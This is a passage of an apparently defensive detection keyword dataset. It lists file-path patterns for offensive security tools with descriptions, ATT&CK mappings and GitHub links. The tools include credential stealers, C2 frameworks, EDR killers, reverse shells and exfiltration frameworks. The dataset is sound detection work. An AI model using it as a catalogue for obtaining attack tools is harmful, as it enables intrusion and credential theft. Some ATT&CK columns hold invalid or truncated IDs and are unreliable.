T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,0,N/A,8,4,N/A,N/A,N/A,N/A -*/share_enum.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/ShareFinder.cs*,offensive_tool_keyword,Snaffler,Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment),T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/SnaffCon/Snaffler,1,1,N/A,N/A,10,1569,163,2023-09-18T06:38:35Z,2020-03-30T07:03:47Z -*/Sharefinder.ps1,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*/shares-with-SCF.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/SharpAzbelt.git*,offensive_tool_keyword,SharpAzbelt,This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources,T1082 - T1003 - T1027 - T1110 - T1078,TA0006 - TA0007 - TA0005 - TA0004 - TA0003,N/A,N/A,Discovery - Collection,https://github.com/redskal/SharpAzbelt,1,1,N/A,8,1,23,6,2023-09-21T21:47:32Z,2023-09-21T21:44:03Z -*/SharpBlackout.git*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*/SharpC2*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/SharpCalendar/*.*,offensive_tool_keyword,cobaltstrike,.NET Assembly to Retrieve Outlook Calendar Details,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpCalendar,1,1,N/A,10,10,13,1,2021-10-07T19:42:20Z,2021-10-07T17:11:46Z -*/SharpCat/*,offensive_tool_keyword,cobaltstrike,C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpCat,1,1,N/A,10,10,16,5,2021-07-15T15:01:02Z,2021-07-15T14:57:53Z -*/SharpChromium.git*,offensive_tool_keyword,SharpChromium,.NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.,T1555.003 - T1114.001 - T1555.004,TA0006 - TA0003,N/A,N/A,Credential Access,https://github.com/djhohnstein/SharpChromium,1,1,N/A,10,7,608,98,2020-10-23T22:28:13Z,2018-08-06T21:25:21Z -*/SharpCloud.git*,offensive_tool_keyword,SharpCloud,Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.,T1083 - T1059.001 - T1114.002,TA0007 - TA0002 ,N/A,N/A,Credential Access,https://github.com/chrismaddalena/SharpCloud,1,1,N/A,10,2,154,27,2018-09-18T02:24:10Z,2018-08-20T15:06:22Z -*/SharpCollection/*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*/SharpCompile/*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*/sharpcompile_*.*,offensive_tool_keyword,cobaltstrike,SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/SpiderLabs/SharpCompile,1,1,N/A,10,10,289,63,2020-08-07T12:49:36Z,2018-11-01T17:18:52Z -*/SharpCradle/*,offensive_tool_keyword,cobaltstrike,SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/SharpCradle,1,1,N/A,10,10,275,59,2020-12-30T17:15:51Z,2018-10-23T06:21:53Z -*/SharpDomainSpray.git*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,1,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*/SharpDoor.cs*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,0,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*/SharpDoor.git*,offensive_tool_keyword,SharpDoor,SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.,T1076 - T1059 - T1085 - T1070.004,TA0008 - TA0002 - TA0009,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/SharpDoor,1,1,N/A,7,3,298,64,2019-09-30T16:11:24Z,2019-09-29T02:24:07Z -*/SharpDPAPI.git*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,1,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -*/SharpDump*,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/SharpEfsPotato*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,1,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*/SharpExfiltrate.git*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*/SharpExfiltrate/*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*/SharpGmailC2.git*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,1,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*/SharpHandler.py*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/SharpHide.git*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,1,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*/SharpLDAP.git*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*/SharpNoPSExec*,offensive_tool_keyword,SharpNoPSExec,Get file less command execution for lateral movement.,T1021.006 - T1059.003 - T1105,TA0008 - TA0002 - TA0011,N/A,N/A,Lateral Movement,https://github.com/juliourena/SharpNoPSExec,1,1,N/A,10,6,567,85,2022-06-03T10:32:55Z,2021-04-24T22:02:38Z -*/SharpRDP.git*,offensive_tool_keyword,SharpRDP,Remote Desktop Protocol .NET Console Application for Authenticated Command Execution,T1021.001 - T1059.001 - T1059.003,TA0008 - TA0002,N/A,N/A,Lateral Movement,https://github.com/0xthirteen/SharpRDP,1,1,N/A,10,9,873,515,2022-11-13T05:29:33Z,2020-01-21T08:31:50Z -*/SharpRDPHijack*,offensive_tool_keyword,SharpRDPHijack,SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions,T1021.001 - T1078.003 - T1059.001,TA0002 - TA0008 - TA0006,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/bohops/SharpRDPHijack,1,1,N/A,10,4,382,84,2021-07-25T17:36:01Z,2020-07-06T02:59:46Z -*/SharpShares/Enums*,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,1,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -*/SharpShellPipe.git*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,1,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*/SharpSocks*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*/SharpSploit*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/SharpSploit/*,offensive_tool_keyword,SharpBlock,A method of bypassing EDR active projection DLL by preventing entry point exection,T1070.004 - T1055.001 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CCob/SharpBlock,1,1,N/A,10,10,975,147,2021-03-31T09:44:48Z,2020-06-14T10:32:16Z -*/SharpSpoolTrigger*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*/SharpSpray.exe*,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,1,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*/SharpStay.git*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*/SharpStay/*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*/SharpSword.git*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*/SharpSword/SharpSword*,offensive_tool_keyword,cobaltstrike,Read the contents of DOCX files using Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,10,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*/SharpSystemTriggers*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*/SharpTerminator/*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*/SharpUnhooker.git*,offensive_tool_keyword,SharpUnhooker,C# Based Universal API Unhooker,T1055.012 - T1070.004 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GetRektBoy724/SharpUnhooker,1,1,N/A,9,4,365,103,2022-02-18T13:11:11Z,2021-05-17T01:33:38Z -*/SharpView.git*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,1,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*/SharpWSUS*,offensive_tool_keyword,SharpWSUS,SharpWSUS is a CSharp tool for lateral movement through WSUS,T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/nettitude/SharpWSUS,1,1,N/A,N/A,5,408,63,2022-11-20T23:41:40Z,2022-05-04T08:27:57Z -*/SharPyShell*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*/shell/password.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/shell/shell_port.*,offensive_tool_keyword,Heroinn,A cross platform C2/post-exploitation framework implementation by Rust.,T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/b23r0/Heroinn,1,1,N/A,10,10,586,223,2022-10-08T07:27:38Z,2015-05-16T14:54:19Z -*/shell_exec.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/Shell3er/*,offensive_tool_keyword,Shell3er,PowerShell Reverse Shell,T1059.001 - T1021.004 - T1090.002,TA0002 - TA0011,N/A,N/A,shell spawning,https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1,1,1,N/A,N/A,1,56,11,2023-05-07T16:02:41Z,2023-05-07T15:35:16Z -*/shellcode*loader.bin*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*/shellcode.bin*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in 